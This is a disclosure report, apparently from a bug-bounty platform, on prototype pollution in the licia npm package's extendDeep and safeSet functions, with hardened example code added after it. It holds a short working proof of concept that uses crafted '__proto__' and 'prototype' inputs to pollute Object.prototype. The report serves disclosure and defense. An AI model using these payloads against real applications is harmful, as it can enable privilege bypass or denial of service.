Prototype Pollution in liriliri/licia
Valid
Reported on
Sep 15th 2020
Description
The licia package is vulnerable to prototype pollution. The affected code is in https://github.com/liriliri/licia/blob/master/src/e/extendDeep.js and https://github.com/liriliri/licia/blob/master/src/s/safeSet.js#L46
Proof of Concept
- Create the PoC file poc.js:
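// PoC 1: extendDeep merges attacker-controlled JSON into the target object
var utils = require('licia');
var src = {};
let object = utils.extendDeep({}, JSON.parse('{ "myProperty": "a", "prototype" : { "isAdmin" : true } }'));
console.log(object.prototype.isAdmin);

// PoC 2: safeSet with a path that goes through __proto__
var licia = require('licia');
var src = {};
licia.safeSet(src, "__proto__.polluted", "pwned!");
// The bare identifier resolves through the global object's prototype chain,
// so it is only defined if Object.prototype was polluted
console.log(polluted);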
- Execute command npm install licia
- Execute command node poc.js
- https://drive.google.com/file/d/1Ef61xgYB6Tzq1We_OiitWUqne0H9skGe/view?usp=sharing
Impact
Prototype pollution, which could lead to DoS and RCE.
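A defensive counterpart to the two functions named in the report, as an added example that is not licia's code or its actual fix: a path setter and a deep merge that refuse the keys used to reach a prototype. The names setPathHardened, mergeDeepHardened and BLOCKED_KEYS are hypothetical.

```javascript
// Added example: hypothetical helpers, not taken from licia's source.
// Keys that give a path or merge access to a prototype object.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
const isPlainObject = (v) =>
  v !== null && typeof v === 'object' && !Array.isArray(v);

// Path setter in the style of safeSet(obj, 'a.b.c', val).
function setPathHardened(obj, path, val) {
  const keys = Array.isArray(path) ? path : String(path).split('.');
  // Reject the whole path up front so nothing is written on failure.
  if (keys.some((k) => BLOCKED_KEYS.has(String(k)))) {
    throw new TypeError('blocked key in path: ' + keys.join('.'));
  }
  let cur = obj;
  for (const key of keys.slice(0, -1)) {
    // Descend only into own properties, never inherited ones.
    if (!hasOwn(cur, key) || !isPlainObject(cur[key])) cur[key] = {};
    cur = cur[key];
  }
  cur[keys[keys.length - 1]] = val;
  return obj;
}

// Deep merge in the style of extendDeep(target, source).
function mergeDeepHardened(target, source) {
  for (const key of Object.keys(source)) {
    // JSON.parse creates "__proto__" as an own key, so it shows up here.
    if (BLOCKED_KEYS.has(key)) continue;
    const val = source[key];
    if (isPlainObject(val)) {
      if (!hasOwn(target, key) || !isPlainObject(target[key])) target[key] = {};
      mergeDeepHardened(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}
```

Throwing in the setter and skipping in the merge are design choices of this example; either function could use the other policy.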